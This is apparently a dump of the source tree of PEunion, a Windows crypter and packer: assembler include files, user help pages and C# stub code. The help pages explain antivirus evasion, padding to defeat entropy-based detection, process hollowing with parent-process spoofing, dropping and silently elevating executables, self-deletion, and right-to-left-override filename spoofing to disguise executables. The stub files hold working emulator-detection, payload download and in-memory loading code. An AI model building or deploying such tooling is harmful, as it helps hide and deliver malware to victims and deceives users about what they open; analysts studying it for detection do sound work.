45 | struc rp cnt \\{ def@assumed reg,.,rp cnt \\}
46 | struc rd cnt \\{ def@assumed reg,.,rd cnt \\}
47 | struc rt cnt \\{ def@assumed reg,.,rt cnt \\}
48 | struc rq cnt \\{ def@assumed reg,.,rq cnt \\}
49 | reg\#@assumed equ
50 | virtual at reg
51 | reg struct
52 | end virtual
53 | purge label
54 | restruc db,dw,dp,dd,dt,dq
55 | restruc rb,rw,rp,rd,rt,rq \} }
56 |
57 | macro def@assumed reg,name,def
58 | { match vars, reg#@assumed \{ reg#@assumed equ reg#@assumed, \}
59 | reg#@assumed equ reg#@assumed name
60 | local ..label
61 | name equ ..label
62 | ..label def }
63 |
64 | struc label type { label . type }
65 |
66 | struc none { label . }
67 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/COMCTL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMCTL32 API calls parameters' count
3 |
4 | CreateMappedBitmap% = 5
5 | CreatePropertySheetPage% = 1
6 | CreateStatusWindow% = 4
7 | CreateToolbar% = 8
8 | CreateToolbarEx% = 13
9 | CreateUpDownControl% = 12
10 | DestroyPropertySheetPage% = 1
11 | DrawInsert% = 3
12 | DrawStatusText% = 4
13 | FlatSB_EnableScrollBar% = 3
14 | FlatSB_GetScrollInfo% = 3
15 | FlatSB_GetScrollPos% = 2
16 | FlatSB_GetScrollProp% = 3
17 | FlatSB_GetScrollRange% = 4
18 | FlatSB_SetScrollInfo% = 4
19 | FlatSB_SetScrollPos% = 4
20 | FlatSB_SetScrollProp% = 4
21 | FlatSB_SetScrollRange% = 5
22 | FlatSB_ShowScrollBar% = 3
23 | GetEffectiveClientRect% = 3
24 | ImageList_Add% = 3
25 | ImageList_AddIcon% = 2
26 | ImageList_AddMasked% = 3
27 | ImageList_BeginDrag% = 4
28 | ImageList_Copy% = 5
29 | ImageList_Create% = 5
30 | ImageList_Destroy% = 1
31 | ImageList_DragEnter% = 3
32 | ImageList_DragLeave% = 1
33 | ImageList_DragMove% = 2
34 | ImageList_DragShowNolock% = 1
35 | ImageList_Draw% = 6
36 | ImageList_DrawEx% = 10
37 | ImageList_DrawIndirect% = 1
38 | ImageList_Duplicate% = 1
39 | ImageList_EndDrag% = 0
40 | ImageList_GetBkColor% = 1
41 | ImageList_GetDragImage% = 2
42 | ImageList_GetIcon% = 3
43 | ImageList_GetIconSize% = 3
44 | ImageList_GetImageCount% = 1
45 | ImageList_GetImageInfo% = 3
46 | ImageList_GetImageRect% = 3
47 | ImageList_LoadImage% = 7
48 | ImageList_Merge% = 6
49 | ImageList_Read% = 1
50 | ImageList_Remove% = 2
51 | ImageList_Replace% = 4
52 | ImageList_ReplaceIcon% = 3
53 | ImageList_SetBkColor% = 2
54 | ImageList_SetDragCursorImage% = 4
55 | ImageList_SetFilter% = 3
56 | ImageList_SetIconSize% = 3
57 | ImageList_SetImageCount% = 2
58 | ImageList_SetOverlayImage% = 3
59 | ImageList_Write% = 2
60 | InitCommonControls% = 0
61 | InitCommonControlsEx% = 1
62 | InitializeFlatSB% = 1
63 | LBItemFromPt% = 4
64 | MakeDragList% = 1
65 | MenuHelp% = 7
66 | PropertySheet% = 1
67 | ShowHideMenuCtl% = 3
68 | UninitializeFlatSB% = 1
69 | _TrackMouseEvent% = 1
70 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls parameters' count
3 |
4 | ChooseColor% = 1
5 | ChooseFont% = 1
6 | CommDlgExtendedError% = 0
7 | FindText% = 1
8 | FormatCharDlgProc% = 4
9 | GetFileTitle% = 3
10 | GetOpenFileName% = 1
11 | GetSaveFileName% = 1
12 | LoadAlterBitmap% = 3
13 | PageSetupDlg% = 1
14 | PrintDlg% = 1
15 | ReplaceText% = 1
16 | WantArrows% = 4
17 | dwLBSubclass% = 4
18 | dwOKSubclass% = 4
19 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/SHELL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; SHELL32 API calls parameters' count
3 |
4 | CheckEscapes% = 2
5 | DoEnvironmentSubst% = 2
6 | DragAcceptFiles% = 2
7 | DragFinish% = 1
8 | DragQueryFile% = 4
9 | DragQueryPoint% = 2
10 | DuplicateIcon% = 2
11 | ExtractAssociatedIcon% = 3
12 | ExtractAssociatedIconEx% = 4
13 | ExtractIcon% = 3
14 | ExtractIconEx% = 5
15 | ExtractIconResInfo% = 5
16 | FindExeDlgProc% = 4
17 | FindExecutable% = 3
18 | FreeIconList% = 2
19 | InternalExtractIconList% = 3
20 | RealShellExecute% = 10
21 | RealShellExecuteEx% = 11
22 | RegenerateUserEnvironment% = 2
23 | SHAddToRecentDocs% = 2
24 | SHAppBarMessage% = 2
25 | SHBrowseForFolder% = 1
26 | SHChangeNotify% = 4
27 | SHEmptyRecycleBin% = 3
28 | SHFileOperation% = 1
29 | SHFormatDrive% = 4
30 | SHFreeNameMappings% = 1
31 | SHGetDataFromIDList% = 5
32 | SHGetDesktopFolder% = 1
33 | SHGetDiskFreeSpace% = 4
34 | SHGetFileInfo% = 5
35 | SHGetInstanceExplorer% = 1
36 | SHGetMalloc% = 1
37 | SHGetNewLinkInfo% = 5
38 | SHGetPathFromIDList% = 2
39 | SHGetSettings% = 2
40 | SHGetSpecialFolderLocation% = 3
41 | SHGetSpecialFolderPath% = 4
42 | SHInvokePrinterCommand% = 5
43 | SHLoadInProc% = 1
44 | SHQueryRecycleBin% = 2
45 | SHUpdateRecycleBinIcon% = 0
46 | SheChangeDir% = 1
47 | SheChangeDirEx% = 1
48 | SheFullPath% = 3
49 | SheGetCurDrive% = 0
50 | SheGetDir% = 2
51 | SheRemoveQuotes% = 1
52 | SheSetCurDrive% = 1
53 | SheShortenPath% = 2
54 | ShellAbout% = 4
55 | ShellExecute% = 6
56 | ShellExecuteEx% = 1
57 | ShellHookProc% = 3
58 | Shell_NotifyIcon% = 2
59 | StrChr% = 2
60 | StrChrI% = 2
61 | StrCmpN% = 3
62 | StrCmpNI% = 3
63 | StrCpyN% = 3
64 | StrNCmp% = 3
65 | StrNCmpI% = 3
66 | StrNCpy% = 3
67 | StrRChr% = 3
68 | StrRChrI% = 3
69 | StrRStr% = 3
70 | StrRStrI% = 3
71 | StrStr% = 2
72 | StrStrI% = 2
73 | WOWShellExecute% = 7
74 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/WSOCK32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; WSOCK32 API calls parameters' count
3 |
4 | AcceptEx% = 8
5 | EnumProtocols% = 3
6 | GetAcceptExSockaddrs% = 8
7 | GetAddressByName% = 10
8 | GetNameByType% = 3
9 | GetService% = 7
10 | GetTypeByName% = 2
11 | MigrateWinsockConfiguration% = 3
12 | NPLoadNameSpaces% = 3
13 | SetService% = 6
14 | TransmitFile% = 7
15 | WEP% = 0
16 | WSAAsyncGetHostByAddr% = 7
17 | WSAAsyncGetHostByName% = 5
18 | WSAAsyncGetProtoByName% = 5
19 | WSAAsyncGetProtoByNumber% = 5
20 | WSAAsyncGetServByName% = 6
21 | WSAAsyncGetServByPort% = 6
22 | WSACancelAsyncRequest% = 4
23 | WSACancelBlockingCall% = 0
24 | WSACleanup% = 0
25 | WSAGetLastError% = 0
26 | WSAIsBlocking% = 0
27 | WSARecvEx% = 4
28 | WSASetBlockingHook% = 1
29 | WSASetLastError% = 1
30 | WSAStartup% = 2
31 | WSAUnhookBlockingHook% = 0
32 | __WSAFDIsSet% = 2
33 | accept% = 3
34 | bind% = 3
35 | closesocket% = 1
36 | connect% = 3
37 | dn_expand% = 5
38 | gethostbyaddr% = 3
39 | gethostbyname% = 1
40 | gethostname% = 2
41 | getnetbyname% = 1
42 | getpeername% = 3
43 | getprotobyname% = 1
44 | getprotobynumber% = 1
45 | getservbyname% = 2
46 | getservbyport% = 2
47 | getsockname% = 3
48 | getsockopt% = 5
49 | htonl% = 1
50 | htons% = 1
51 | inet_addr% = 1
52 | inet_network% = 1
53 | inet_ntoa% = 1
54 | ioctlsocket% = 3
55 | listen% = 2
56 | ntohl% = 1
57 | ntohs% = 1
58 | rcmd% = 6
59 | recv% = 4
60 | recvfrom% = 6
61 | rexec% = 6
62 | rresvport% = 1
63 | s_perror% = 2
64 | select% = 5
65 | send% = 4
66 | sendto% = 6
67 | sethostname% = 2
68 | setsockopt% = 5
69 | shutdown% = 2
70 | socket% = 3
71 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN32A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#A
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN32W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#W
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN64A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#A
24 | end if }
25 |
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN64W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#W
24 | end if }
--------------------------------------------------------------------------------
/contrib/PEunion/Help/App/Changelog.md:
--------------------------------------------------------------------------------
1 | # Changelog
2 |
3 | ## 4.0.0 (08.09.2021)
4 |
5 | **Initial release:** Complete re-design of version 3.x
6 |
7 | * Two stubs (native & .NET)
8 | * AV evasion & emulator detection
9 | * Low entropy packing scheme
10 | * Improved obfuscation engine
11 | * Commandline compiler for project files
12 | * UI & usability overhaul
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Default.md:
--------------------------------------------------------------------------------
1 | # Help
2 |
3 | Click on the
4 | 
5 | icons on any page to get more information.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Drop.md:
--------------------------------------------------------------------------------
1 | # Drop file
2 |
3 | A file is written to disk.
4 |
5 | * `Drop Location`: The base directory to write the file in
6 | * `Drop Filename`: The filename of the written file
7 | * `Set File Attributes`: File attributes of the written file
8 |
9 | Optionally, this file can be executed:
10 |
11 | * `Do not execute`: Just write the file to disk
12 | * `Execute`: Execute via `ShellExecute` with the `open` verb
13 | * `Execute elevated`: Execute via `ShellExecute` with the `runas` verb
14 |
15 | If using the `runas` verb and the user does not consent, the file will not be run, but the stub continues execution.
16 |
17 | ## Example
18 |
19 | The stub has two items:
20 |
21 | 1. `RunPE` a small executable
22 | 2. `Drop` a large file to the temp directory and execute
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Invoke.md:
--------------------------------------------------------------------------------
1 | # Invoke (.NET)
2 |
3 | A .NET executable is executed in-memory. This is achieved using built-in language capability:
4 |
5 | ```
6 | byte[] dotNetExecutable = ....;
7 | Assembly.Load(dotNetExecutable).EntryPoint.Invoke()
8 | ```
9 |
10 | This feature is only available in a .NET stub. It is recommended to use `Invoke` for .NET executables instead of `RunPE`.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/MessageBox.md:
--------------------------------------------------------------------------------
1 | # Message Box
2 |
3 | Displays a Message Box with the specified content. Click `Preview` to see the MessageBox.
4 |
5 | ## Events
6 |
7 | A button click does nothing by default. However, it can be used to trigger specific actions:
8 |
9 | * `Skip next action`: The next item of the project is not executed if the button was clicked
10 | * `Exit`: The stub terminates if the button was clicked
11 |
12 | **Example:**
13 |
14 | ```
15 | Do you want to write "file.exe" to disk?
16 | [Yes] [No]
17 | ```
18 |
19 | In this example, the next item is a `Drop` and the event of the No-button is set to `Skip next action`. The Yes-button is set to `Do nothing`.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/RunPE.md:
--------------------------------------------------------------------------------
1 | # RunPE (process hollowing)
2 |
3 | A native executable is executed in-memory. For .NET executables, use `Invoke` in a .NET stub.
4 |
5 | A new process is created in a suspended state. The process memory is replaced with the specified file and the process is resumed. The new process is forked from the originally executed file (the stub). Additionally, the parent process ID is spoofed. Most importantly, the file is not written to disk.
6 |
7 | If the file contains EOF data, check `Use EOF Data` to include EOF data in the stub.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Source.md:
--------------------------------------------------------------------------------
1 | # Item Source
2 |
3 | `Source` is the file to be used.
4 |
5 | ## Embedded file
6 |
7 | The file is embedded in the compiled binary.
8 |
9 | ### File properties
10 |
11 | * `Compress`: The file is stored compressed. This is not recommended for large files, as decompression might exceed memory limits. Compression does not increase executable entropy as all embedded files are encrypted in addition. Use `stub padding` to decrease entropy.
12 | * `Use EOF Data`: If the executable contains data after the end of the file, these bytes are appended to the compiled binary in unencrypted form.
13 |
14 | ## Download
15 |
16 | The file is downloaded from the specified URL.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Manifest.md:
--------------------------------------------------------------------------------
1 | # Manifest
2 |
3 | A manifest can be included in the output binary. Two templates exist:
4 |
5 | * `Default`: A standard manifest with a `requestedExecutionLevel` of `asInvoker`
6 | * `Elevated`: A UAC manifest with a `requestedExecutionLevel` of `requireAdministrator`
7 |
8 | In addition to the standard templates, a custom manifest file can be specified. It is advisable to always include a manifest.
9 |
10 | If the output binary requires elevated privileges, a UAC manifest should be included.
11 |
12 | ## Example of mixed elevated / not elevated usage
13 |
14 | * One executable is run in-memory (RunPE) and does not require elevated privileges
15 | * Another executable which requires elevated privileges is dropped and executed
16 |
17 | If a UAC manifest is included and the user cancels elevation, both executables are **not** run. By not including a UAC manifest, the in-memory execution still takes place. The dropped file will then trigger the UAC dialog.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StartupMelt.md:
--------------------------------------------------------------------------------
1 | # Melt
2 |
3 | The executable deletes itself.
4 |
5 | A `powershell.exe` process is started that attempts to delete the file every 100ms for a duration of up to 1 minute.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubIcon.md:
--------------------------------------------------------------------------------
1 | # Stub Icon
2 |
3 | The compiled binary has no icon by default. To define an icon, select an `.ico` file.
4 |
5 | If you select an `.exe` file as the icon source, the icon of that executable is extracted and used.
6 |
7 | Click `From Item` to extract an icon from one of the executable files of your project.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubPadding.md:
--------------------------------------------------------------------------------
1 | # Stub Padding
2 |
3 | At runtime, the stub decrypts the main shellcode that contains the "actual" stub and all embedded files.
4 |
5 | However, encryption results in high-entropy, which causes AV alerts. Therefore, a low-entropy packing scheme is used. The padding consists of `0x00` bytes that are intermingled with the encrypted shellcode.
6 |
7 | `Padding` example values:
8 |
9 | * `50`: The compiled file will be about 50% larger **(recommended)**
10 | * `100`: The compiled file will be about twice as large
11 | * `500`: The compiled file will be about 6 times as large
12 |
13 | Padding can also be used to simulate a larger file, if required.
14 |
15 | **Note:** The size differences may vary by several KB.
16 |
17 | **Important:** It is generally advisable to set the padding to about `50` to not cause packer detection due to high entropy. **Compressing** files and applying a padding of **50** afterwards is recommendable.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubType.md:
--------------------------------------------------------------------------------
1 | # Stub
2 |
3 | * The native stub is written in assembly and compiled with the FASM compiler
4 | * The .NET stub is written in C# and compiled using CodeDom, targeting either x86 or x64
5 |
6 | **Note:** If you want to execute a .NET executable in-memory, use `Invoke` instead of `RunPE`. For this, the .NET stub is required.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/Icon.md:
--------------------------------------------------------------------------------
1 | # Icon
2 |
3 | You can optionally change the icon of the saved file. This only works for executables. The saved file's resources are updated to include the selected icon.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/NewFilename.md:
--------------------------------------------------------------------------------
1 | # New Filename
2 |
3 | The new filename is made of 3 parts:
4 |
5 | 1. `Filename`: The first part of the new filename
6 | 2. `Extension`: The original extension of the file, in reverse character order
7 | 3. `Spoofed Extension`: An arbitrary spoofed extension
8 |
9 | Due to the right-to-left override character, the `Extension` part is displayed in the middle of the new filename and in reverse character order. However, the `Exact Character Representation` shows that it is still the actual extension of the new file.
10 |
11 | Therefore, it cannot be changed. However, some extensions are interchangeable, such as `.exe` and `.scr`. This is why `rcs` appears in the DropDown list when your original file is an `.exe` file.
12 |
13 | **Tip:** Try typing different strings into part 1, 2 and 3 and watch the changes in the `Preview` section.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/OriginalFile.md:
--------------------------------------------------------------------------------
1 | # Original File
2 |
3 | This is the original file to be used. Follow these steps to create a new file with the right-to-left override character:
4 |
5 | 1. Select a file.
6 | 2. Under `New Filename`, change any of the 3 parts of the filename
7 | 3. Check the `Preview` section to see the new filename
8 | 4. If required, change the icon of the output file
9 |
10 | When you click `Save`, the originally selected file will be copied to the new location using the new filename containing the right-to-left override character.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/Preview.md:
--------------------------------------------------------------------------------
1 | # Preview
2 |
3 | This is the preview of the new filename.
4 |
5 | ## Display name in File Explorer
6 |
7 | This is what your new file will look like in File Explorer.
8 |
9 | ## Exact character representation
10 |
11 | This is the actual string of the new filename. `(U+202E)` is the right-to-left override character. After this character, the string is displayed in reverse.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Template.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
49 |
50 |
51 | {BODY}
52 |
53 |
--------------------------------------------------------------------------------
/contrib/PEunion/LICENSE.md:
--------------------------------------------------------------------------------
1 | Copyright (c) 2021, bytecode77
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | * Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 |
10 | * Redistributions in binary form must reproduce the above copyright notice, this
11 | list of conditions and the following disclaimer in the documentation and/or
12 | other materials provided with the distribution.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
15 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
16 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
18 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
19 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
20 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
21 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
22 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
23 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/contrib/PEunion/PEunion.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/PEunion.exe
--------------------------------------------------------------------------------
/contrib/PEunion/PEunion.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Compression.cs:
--------------------------------------------------------------------------------
1 | using System.IO;
2 | using System.IO.Compression;
3 |
public partial class __Stub
{
    /// <summary>
    /// byte[] Decompress(byte[] data)
    /// Inflates a GZip-compressed buffer and returns the decompressed bytes.
    /// </summary>
    public static byte[] __Decompress(byte[] __data)
    {
        // Chain source -> GZip inflater -> in-memory sink; all three are
        // disposed when the block exits.
        using (MemoryStream source = new MemoryStream(__data))
        using (GZipStream inflater = new GZipStream(source, CompressionMode.Decompress))
        using (MemoryStream sink = new MemoryStream())
        {
            inflater.CopyTo(sink);
            return sink.ToArray();
        }
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Download.cs:
--------------------------------------------------------------------------------
1 | using System.Net;
2 |
public partial class __Stub
{
    /// <summary>
    /// byte[] Download(string url)
    /// Fetches the resource at the given URL with WebClient and returns the
    /// response body as a byte array.
    /// </summary>
    public static byte[] __Download(string __url)
    {
        // Add each listed SSL/TLS protocol version to the static
        // ServicePointManager.SecurityProtocol setting. This only widens the
        // set of protocol versions that may be negotiated; nothing in this
        // method changes certificate validation.
        // NOTE(review): the list includes SSL3, which is a deprecated protocol,
        // and the setting is static, so it is not limited to this one request.
        foreach (int protocol in new[]
        {
            /**/48, // SSL3
            /**/192, // TLS
            /**/768, // TLS 1.1
            /**/3072, // TLS 1.2
            /**/12288, // TLS 1.3
        })
        {
            try
            {
                ServicePointManager.SecurityProtocol |= (SecurityProtocolType)protocol;
            }
            catch
            {
                // A value that makes the assignment throw is skipped silently.
            }
        }

        // Download file: the body is returned in memory; this method does not
        // write it to disk.
        using (WebClient webClient = new WebClient())
        {
            return webClient.DownloadData(__url);
        }
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Emulator.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Reflection;
4 |
public partial class __Stub
{
    /// <summary>
    /// void DetectEmulator()
    /// Runs a fixed series of environment checks and terminates the process
    /// with exit code 0 as soon as one of them fails.
    /// </summary>
    /// <remarks>
    /// For analysts: the hard-coded machine names and executable paths below
    /// are literal values in this source and can serve as static indicators
    /// when triaging a sample built from this stub (the /**/ markers may mean
    /// they are transformed at build time - verify against a compiled sample).
    /// A sandbox whose host name or sample path matches one of them will see
    /// the process exit cleanly without further activity.
    /// </remarks>
    public static void __DetectEmulator()
    {
        // Get WinAPI functions
        // (__GetFunction and the delegate types are declared outside this file.)
        __SetErrorModeDelegate setErrorMode = __GetFunction<__SetErrorModeDelegate>(/**/"kernel32.dll", /**/"SetErrorMode");
        __VirtualAllocExNumaDelegate virtualAllocExNuma = __GetFunction<__VirtualAllocExNumaDelegate>(/**/"kernel32.dll", /**/"VirtualAllocExNuma");

        // Allocating 100 MB of memory must work
        // Every byte is written; a failure here surfaces as an exception, not
        // as Environment.Exit.
        {
            byte[] memory = new byte[/**/1024 * /**/1024 * /**/100];
            for (int i = /**/0; i < memory.Length; i++) memory[i] = 255;
        }

        // SetErrorMode return value must match previous value
        // The mode is set to 1024, then to 0; the second call is expected to
        // return the 1024 that was just set.
        {
            setErrorMode((uint)/**/1024);
            if (setErrorMode((uint)/**/0) != /**/1024) Environment.Exit(/**/0);
        }

        // VirtualAllocExNuma must work
        // Arguments: handle -1 (current-process pseudo-handle), no preferred
        // address, 1000 bytes, 0x3000 (MEM_COMMIT | MEM_RESERVE),
        // 0x4 (PAGE_READWRITE), NUMA node 0. A null result ends the process.
        {
            if (virtualAllocExNuma((IntPtr)(/**/-1), (IntPtr)/**/0, (uint)/**/1000, (uint)/**/0x3000, (uint)/**/0x4, (uint)/**/0) == (IntPtr)/**/0) Environment.Exit(/**/0);
        }

        // Computer name is not a known emulator name:
        // - NfZtFbPfH
        // - ELICZ
        // - tz
        // - MAIN
        // The comparison uses ==, so it is case-sensitive.
        {
            if (Environment.MachineName == /**/"NfZtFbPfH" ||
                Environment.MachineName == /**/"ELICZ" ||
                Environment.MachineName == /**/"tz" ||
                Environment.MachineName == /**/"MAIN") Environment.Exit(/**/0);
        }

        // Executable path is not a known emulator path:
        // - C:\[...]\mwsmpl.exe
        // - C:\SELF.EXE
        // - myapp.exe
        // The first two are compared against the full path, the third against
        // the file name only; all three ignore case.
        {
            string path = Assembly.GetEntryAssembly().Location;
            if (path.Equals(/**/"C:\\Documents and Settings\\Administrator\\My Documents\\mwsmpl.exe", StringComparison.OrdinalIgnoreCase) ||
                path.Equals(/**/"C:\\SELF.EXE", StringComparison.OrdinalIgnoreCase) ||
                Path.GetFileName(path).Equals(/**/"myapp.exe", StringComparison.OrdinalIgnoreCase)) Environment.Exit(/**/0);
        }
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/GetResource.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Resources;
4 |
public partial class __Stub
{
    /// <summary>
    /// byte[] GetResource(string name)
    /// Reads the named entry from the first manifest resource of the executing
    /// assembly and returns its bytes without the 4-byte size prefix.
    /// </summary>
    public static byte[] __GetResource(string __name)
    {
        Assembly self = Assembly.GetExecutingAssembly();
        string firstResourceName = self.GetManifestResourceNames()[/**/0];

        using (ResourceReader resources = new ResourceReader(self.GetManifestResourceStream(firstResourceName)))
        {
            // Look up the raw entry; the reported type name is not used.
            string typeName;
            byte[] raw;
            resources.GetResourceData(__name, out typeName, out raw);

            // The raw entry starts with a 4-byte size field; copy what follows it.
            int payloadLength = raw.Length - /**/4;
            byte[] payload = new byte[payloadLength];
            Buffer.BlockCopy(raw, /**/4, payload, /**/0, payloadLength);

            return payload;
        }
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Invoke.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Threading;
3 |
public partial class __Stub
{
    /// <summary>
    /// void Invoke(byte[] payload)
    /// Loads the given bytes as a .NET assembly and calls its entry point on a
    /// newly started thread, passing __CommandLineArguments as the argument array.
    /// </summary>
    /// <remarks>
    /// The assembly is loaded from a byte array, so this method creates no file
    /// on disk. For defenders: a byte-array load of this kind is presumably
    /// still visible to CLR assembly-load telemetry - confirm with the
    /// monitoring in use.
    /// </remarks>
    public static void __Invoke(byte[] __payload)
    {
        // The load and the entry-point call both happen on the new thread; the
        // caller does not wait for it, and nothing here catches an exception
        // thrown by the payload.
        Thread thread = new Thread(() =>
        {
            // __CommandLineArguments is a static field declared in another
            // part of this partial class.
            Assembly.Load(__payload).EntryPoint.Invoke(null, new[] { __CommandLineArguments });
        });

        // Request a single-threaded apartment before starting; the boolean
        // result of TrySetApartmentState is ignored.
        thread.TrySetApartmentState(ApartmentState.STA);
        thread.Start();
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Resources/default.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Resources/elevated.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Stage2.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Windows.Forms;
6 |
public partial class __Stub
{
    // Combined command line, taken from args[0] in Main.
    public static string __CommandLine;
    // Individual command-line arguments, taken from args[1..n] in Main.
    public static string[] __CommandLineArguments;

    /// <summary>
    /// void Main(string[] args)
    /// Entry point of the second stage: stores the command line, runs the code
